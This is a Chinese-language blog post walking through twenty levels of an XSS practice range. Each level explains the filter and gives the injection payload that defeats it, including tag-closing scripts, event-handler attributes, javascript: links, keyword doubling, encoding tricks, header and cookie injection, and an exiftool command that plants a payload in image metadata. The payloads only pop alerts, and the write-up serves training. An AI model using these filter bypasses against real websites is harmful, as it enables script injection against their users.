<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.2.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.4/css/all.min.css" integrity="sha256-mUZM63G8m73Mcidfrv5E+Y61y7a12O5mW4ezU3bxqW4=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"sunian19.github.io","root":"/","images":"/images","scheme":"Gemini","darkmode":false,"version":"8.8.1","exturl":false,"sidebar":{"position":"right","display":"post","padding":18,"offset":12},"copycode":true,"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js"></script>
<meta name="description" content="所使用靶场 地址http:&#x2F;&#x2F;test.ctf8.com&#x2F; 源码链接：https:&#x2F;&#x2F;pan.baidu.com&#x2F;s&#x2F;1I54ZBYOHujP2WZdtcjNfGw 提取码：xqbh">
<meta property="og:type" content="article">
<meta property="og:title" content="&#39;XSS挑战之旅&#39;">
<meta property="og:url" content="https://sunian19.github.io/2019/12/10/XSS%E6%8C%91%E6%88%98%E4%B9%8B%E6%97%85/index.html">
<meta property="og:site_name" content="zer0_c|imb&#39;s blog">
<meta property="og:description" content="所使用靶场 地址http:&#x2F;&#x2F;test.ctf8.com&#x2F; 源码链接：https:&#x2F;&#x2F;pan.baidu.com&#x2F;s&#x2F;1I54ZBYOHujP2WZdtcjNfGw 提取码：xqbh">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://sunian19.github.io/imgss/t77.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t79.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t78.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t80.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t81.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t82.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t83.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t84.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t85.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t86.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t87.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t88.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t90.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t91.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t89.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t92.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t93.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t94.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t95.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t96.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t97.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t98.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t99.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/u2.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/u1.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/u3.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/u4.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/u5.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/u6.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/u7.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/u8.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/u9.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/u10.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/u11.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/u12.png">
<meta property="article:published_time" content="2019-12-10T02:54:41.000Z">
<meta property="article:modified_time" content="2020-04-06T06:06:36.000Z">
<meta property="article:author" content="zer0_c|imb">
<meta property="article:tag" content="XSS">
<meta property="article:tag" content="靶场">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://sunian19.github.io/imgss/t77.png">


<link rel="canonical" href="https://sunian19.github.io/2019/12/10/XSS%E6%8C%91%E6%88%98%E4%B9%8B%E6%97%85/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"https://sunian19.github.io/2019/12/10/XSS%E6%8C%91%E6%88%98%E4%B9%8B%E6%97%85/","path":"2019/12/10/XSS挑战之旅/","title":"'XSS挑战之旅'"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>'XSS挑战之旅' | zer0_c|imb's blog</title>
  

  <script src="/js/third-party/analytics/baidu-analytics.js"></script>
  <script async src="https://hm.baidu.com/hm.js?48584c486973b4bf025a425c3d7b4007"></script>



  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <h1 class="site-title">zer0_c|imb's blog</h1>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu">
        <li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li>
        <li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li>
        <li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li>
        <li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li>
        <li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup"><div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close" role="button">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</div>
        
  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#suo-shi-yong-ba-chang"><span class="nav-number">1.</span> <span class="nav-text">所使用靶场</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level-1"><span class="nav-number">2.</span> <span class="nav-text">level 1</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level-2"><span class="nav-number">3.</span> <span class="nav-text">level 2</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level-3"><span class="nav-number">4.</span> <span class="nav-text">level 3</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level-4"><span class="nav-number">5.</span> <span class="nav-text">level 4</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level-5"><span class="nav-number">6.</span> <span class="nav-text">level 5</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level-6"><span class="nav-number">7.</span> <span class="nav-text">level 6</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level-7"><span class="nav-number">8.</span> <span class="nav-text">level 7</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level-8"><span class="nav-number">9.</span> <span class="nav-text">level 8</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level-9"><span class="nav-number">10.</span> <span class="nav-text">level 9</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level-10"><span class="nav-number">11.</span> <span class="nav-text">level 10</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level-11"><span class="nav-number">12.</span> <span class="nav-text">level 11</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level-12"><span class="nav-number">13.</span> <span class="nav-text">level 12</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level-13"><span class="nav-number">14.</span> <span class="nav-text">level 13</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level-14"><span class="nav-number">15.</span> <span class="nav-text">level 14</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level-15"><span class="nav-number">16.</span> <span class="nav-text">level 15</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level-16"><span class="nav-number">17.</span> <span class="nav-text">level 16</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level-17"><span class="nav-number">18.</span> <span class="nav-text">level 17</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level-18"><span class="nav-number">19.</span> <span class="nav-text">level 18</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level-19"><span class="nav-number">20.</span> <span class="nav-text">level 19</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level-20"><span class="nav-number">21.</span> <span class="nav-text">level 20</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="zer0_c|imb"
      src="/imgss/touxiang.jpg">
  <p class="site-author-name" itemprop="name">zer0_c|imb</p>
  <div class="site-description" itemprop="description">忘川河畔彼岸花，红如鲜血似朱砂</div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">94</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">16</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">39</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author site-overview-item animated">
      <span class="links-of-author-item">
        <a href="mailto:lingyu195@gmail.com" title="E-Mail → mailto:lingyu195@gmail.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
      <span class="links-of-author-item">
        <a href="tencent://AddContact/?fromId=45&fromSubId=1&subcmd=all&uin=3504078815" title="QQ → tencent:&#x2F;&#x2F;AddContact&#x2F;?fromId&#x3D;45&amp;fromSubId&#x3D;1&amp;subcmd&#x3D;all&amp;uin&#x3D;3504078815" rel="noopener" target="_blank"><i class="qq fa-fw"></i>QQ</a>
      </span>
  </div>


  <div class="links-of-blogroll site-overview-item animated">
    <div class="links-of-blogroll-title"><i class="fa fa-globe fa-fw"></i>
      友情链接
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="http://www.ch4ser.top/" title="http:&#x2F;&#x2F;www.ch4ser.top&#x2F;" rel="noopener" target="_blank">ch4ser</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="http://hackergu.com/" title="http:&#x2F;&#x2F;hackergu.com&#x2F;" rel="noopener" target="_blank">Gu</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://al0neranger.github.io/" title="https:&#x2F;&#x2F;al0neranger.github.io&#x2F;" rel="noopener" target="_blank">al0neranger</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://www.cnblogs.com/lyshark" title="https:&#x2F;&#x2F;www.cnblogs.com&#x2F;lyshark" rel="noopener" target="_blank">lyshark</a>
        </li>
    </ul>
  </div>

        </div>
      </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://sunian19.github.io/2019/12/10/XSS%E6%8C%91%E6%88%98%E4%B9%8B%E6%97%85/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/imgss/touxiang.jpg">
      <meta itemprop="name" content="zer0_c|imb">
      <meta itemprop="description" content="忘川河畔彼岸花，红如鲜血似朱砂">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="zer0_c|imb's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          'XSS挑战之旅'
        </h1>


        <div class="post-meta">
        
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2019-12-10 10:54:41" itemprop="dateCreated datePublished" datetime="2019-12-10T10:54:41+08:00">2019-12-10</time>
    </span>
      <span class="post-meta-item">
        <span class="post-meta-item-icon">
          <i class="far fa-calendar-check"></i>
        </span>
        <span class="post-meta-item-text">更新于</span>
        <time title="修改时间：2020-04-06 14:06:36" itemprop="dateModified" datetime="2020-04-06T14:06:36+08:00">2020-04-06</time>
      </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/XSS/" itemprop="url" rel="index"><span itemprop="name">XSS</span></a>
        </span>
    </span>

  
    <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">阅读次数：</span>
      <span id="busuanzi_value_page_pv"></span>
    </span>
</div>

        </div>

      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <h3 id="suo-shi-yong-ba-chang" id="所使用靶场">所使用靶场</h3>
<p>地址http://test.ctf8.com/<br>
源码链接：<a target="_blank" rel="noopener" href="https://pan.baidu.com/s/1I54ZBYOHujP2WZdtcjNfGw">https://pan.baidu.com/s/1I54ZBYOHujP2WZdtcjNfGw</a><br>
提取码：xqbh</p>
<a id="more"></a>
<h3 id="level-1" id="level-1">level 1</h3>
<p>这关用户名是可控的，我们查看源代码，闭合h2标签</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;&#x2F;h2&gt;&lt;script&gt;alert(1)&lt;&#x2F;script&gt;</span><br></pre></td></tr></table></figure></div>
<p><img src="/imgss/t77.png" alt=""></p>
<h3 id="level-2" id="level-2">level 2</h3>
<p>这关也一样，通过查看源代码，闭合标签<br>
<img src="/imgss/t79.png" alt=""></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;&gt;&lt;script&gt;alert(1)&lt;%2Fscript&gt;&lt;&quot;</span><br></pre></td></tr></table></figure></div>
<p><img src="/imgss/t78.png" alt=""></p>
<h3 id="level-3" id="level-3">level 3</h3>
<p>查看页面源码闭合语句，发现没通过，再次查看源代码，发现左右尖括号被编码,我们利用onclick点击事件，被点击时，执行JS代码<br>
<img src="/imgss/t80.png" alt=""></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#39; onclick&#x3D;&#39;alert(1)&#39;</span><br></pre></td></tr></table></figure></div>
<p><img src="/imgss/t81.png" alt=""></p>
<h3 id="level-4" id="level-4">level 4</h3>
<p>这关和上一关一样，不过替换了单引号，利用双引号进行闭合</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot; onclick&#x3D;&quot;alert(1)&quot;</span><br></pre></td></tr></table></figure></div>
<p><img src="/imgss/t82.png" alt=""></p>
<h3 id="level-5" id="level-5">level 5</h3>
<p>这关会把on进行分离o_n，双引号进行编码，script进行分离scr_ipt，并且全部小写<br>
我们用a标签和href写个链接出来，点击链接触发XSS<br>
<img src="/imgss/t83.png" alt=""></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">123456&quot;&gt; &lt;a href&#x3D;javascript:alert(1) &gt;XSS&lt;&#x2F;a&gt;</span><br></pre></td></tr></table></figure></div>
<p><img src="/imgss/t84.png" alt=""></p>
<h3 id="level-6" id="level-6">level 6</h3>
<p>这关herf进行分离he_rf，其他和第五关一样，不过少了大小写转换</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&quot;&gt;&lt;ScRipt&gt;alert(&quot;xss&quot;)&lt;&#x2F;script&gt;</span><br><span class="line">&quot;&gt;&lt;a HREF&#x3D;&quot; javascript:alert(1)&quot;</span><br></pre></td></tr></table></figure></div>
<p><img src="/imgss/t85.png" alt=""></p>
<h3 id="level-7" id="level-7">level 7</h3>
<p>这关把script等关键字替换为空，我们双写即可绕过</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&quot;&gt;&lt;scrscriptipt&gt;alert(&quot;xss&quot;)&lt;&#x2F;scrscriptipt&gt;</span><br><span class="line">1&quot; oonnclick&#x3D;alert(1)&#x2F;&#x2F;</span><br></pre></td></tr></table></figure></div>
<p><img src="/imgss/t86.png" alt=""></p>
<h3 id="level-8" id="level-8">level 8</h3>
<p>这关直接有个a标签herf，不过script会替换成scr_ipt，可以用%09换行掉_下划线，也可以实体编码，(注意使用第一句代码%09替换时输入到url中，不然%09无法解析)<br>
在线编解码网站http://www.ofmonkey.com/encode/html</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">javascr%09ipt:alert(1)</span><br><span class="line">&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#49;&amp;#41;</span><br></pre></td></tr></table></figure></div>
<p><img src="/imgss/t87.png" alt=""></p>
<h3 id="level-9" id="level-9">level 9</h3>
<p>这关检测了友链的合法性，http://</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">javascr%09ipt:alert(1)&#x2F;&#x2F;http:&#x2F;&#x2F;</span><br><span class="line">javasc%09ript:alert(&#39;http:&#x2F;&#x2F;&#39;);</span><br></pre></td></tr></table></figure></div>
<p><img src="/imgss/t88.png" alt=""></p>
<h3 id="level-10" id="level-10">level 10</h3>
<p>keyword 过滤较严格。但是有三个隐藏参数t_link， t_history，t_sort，都手动加上：?keyword=&amp;t_link=“&amp;t_history=”&amp;t_sort=&quot;<br>
发现只有 t_sort 有输出：<br>
<img src="/imgss/t90.png" alt=""><br>
<img src="/imgss/t91.png" alt=""></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&amp;t_sort&#x3D;&quot; type&#x3D;&quot;text&quot; onclick&#x3D;&quot;alert(1)</span><br></pre></td></tr></table></figure></div>
<p><img src="/imgss/t89.png" alt=""></p>
<h3 id="level-11" id="level-11">level 11</h3>
<p>这关t_ref这个值就是http请求中的referer，所以抓包改包<br>
<img src="/imgss/t92.png" alt=""><br>
<img src="/imgss/t93.png" alt=""><br>
<img src="/imgss/t94.png" alt=""><br>
<img src="/imgss/t95.png" alt=""></p>
<h3 id="level-12" id="level-12">level 12</h3>
<p>这关通过查看源代码，t_ua是user-Agent头，再次抓包改包，和上一关一样，就不截图了(懒)<br>
<img src="/imgss/t96.png" alt=""><br>
<img src="/imgss/t97.png" alt=""></p>
<h3 id="level-13" id="level-13">level 13</h3>
<p>这关变成了cookie，抓包改包<br>
<img src="/imgss/t98.png" alt=""><br>
<img src="/imgss/t99.png" alt=""></p>
<h3 id="level-14" id="level-14">level 14</h3>
<p>exif 题目失效,图片加载不出来<br>
与exif有关的博客： <a target="_blank" rel="noopener" href="http://blog.sina.com.cn/s/blog_722cb9a90102wl2c.html">http://blog.sina.com.cn/s/blog_722cb9a90102wl2c.html</a><br>
漏洞成因：chrome插件exif viewer获取图片exif信息时没有进行过滤，导致xss代码执行。</p>
<p>exif xss，一般利用于文件上传的地方，最经典的就是头像上传，上传一个图片，该图片的exif元数据被修改为xss payload，成功利用弹窗，具体实现使用kali下的exiftool工具，命令如下：</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">exiftool -FIELD&#x3D;XSS FILE</span><br><span class="line">exiftool -Artist&#x3D;&#39; &quot;&gt;&lt;img src&#x3D;1 onerror&#x3D;alert(document.domain)&gt;&#39; brute.jpeg</span><br></pre></td></tr></table></figure></div>
<h3 id="level-15" id="level-15">level 15</h3>
<p>这关用了ng-include函数类似于PHP中的文件包含include()，所以我们包含第一关就好了<br>
不知道为啥火狐包含不过去，用了谷歌就好了。。。。<br>
<img src="/imgss/u2.png" alt=""></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">src&#x3D;&#39;level1.php?name&#x3D;&lt;img src&#x3D;x onerror&#x3D;alert(1)&gt;&#39;</span><br></pre></td></tr></table></figure></div>
<p><img src="/imgss/u1.png" alt=""></p>
<h3 id="level-16" id="level-16">level 16</h3>
<p>这关通过查看源码发现，大小写绕过失效，script、/、空格等都被转换成&amp;nbsp，这时，可以尝试使用%0a,%0d来进行绕过<br>
<img src="/imgss/u3.png" alt=""></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">keyword&#x3D;&lt;img%0Asrc&#x3D;1%0Aonerror&#x3D;alert(1)&gt;</span><br></pre></td></tr></table></figure></div>
<p><img src="/imgss/u4.png" alt=""></p>
<h3 id="level-17" id="level-17">level 17</h3>
<p>embed标签可以引入swf文件，我们加个鼠标移动事件就可以了，搞不懂火狐，又没反应<br>
<img src="/imgss/u5.png" alt=""></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">arg01&#x3D;a&amp;arg02&#x3D;b%20onmouseover&#x3D;alert(1)</span><br></pre></td></tr></table></figure></div>
<p><img src="/imgss/u6.png" alt=""></p>
<h3 id="level-18" id="level-18">level 18</h3>
<p>和上一关一样<br>
<img src="/imgss/u7.png" alt=""></p>
<h3 id="level-19" id="level-19">level 19</h3>
<p>flash xss，需要对flash的反编译对源码进行分析，这里使用jpexs-decompiler来分析，首先定位getURL函数<br>
工具地址 <a target="_blank" rel="noopener" href="https://github.com/jindrapetrik/jpexs-decompiler">https://github.com/jindrapetrik/jpexs-decompiler</a><br>
<img src="/imgss/u8.png" alt=""><br>
然后追踪到sIFR的内容<br>
<img src="/imgss/u9.png" alt=""><br>
得知version参数可以传入loc4变量中，即sIFR的内容中，但是getURL只在内容为link时打开，所以分析contentIsLink函数<br>
<img src="/imgss/u10.png" alt=""><br>
所以我们可以构造a标签来传值</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">arg01&#x3D;version&amp;arg02&#x3D;&lt;a href&#x3D;&quot;javascript:alert(1)&quot;&gt;123&lt;&#x2F;a&gt;</span><br></pre></td></tr></table></figure></div>
<p><img src="/imgss/u11.png" alt=""></p>
<h3 id="level-20" id="level-20">level 20</h3>
<p>最后这关没搞懂，验证一下代码</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?arg01&#x3D;id&amp;arg02&#x3D;\%22))&#125;catch(e)&#123;&#125;if(!self.a)self.a&#x3D;!alert(1)&#x2F;&#x2F;%26width%26height</span><br></pre></td></tr></table></figure></div>
<p><img src="/imgss/u12.png" alt=""><br>
参考链接https://www.jianshu.com/p/4e3a517bc4ea</p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/XSS/" rel="tag"># XSS</a>
              <a href="/tags/%E9%9D%B6%E5%9C%BA/" rel="tag"># 靶场</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2019/12/10/XSS%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/" rel="prev" title="'XSS靶场通关'">
                  <i class="fa fa-chevron-left"></i> 'XSS靶场通关'
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2019/12/11/XSS%E5%9F%BA%E7%A1%80/" rel="next" title="'XSS基础'">
                  'XSS基础' <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">zer0_c|imb</span>
</div>
<div class="busuanzi-count">
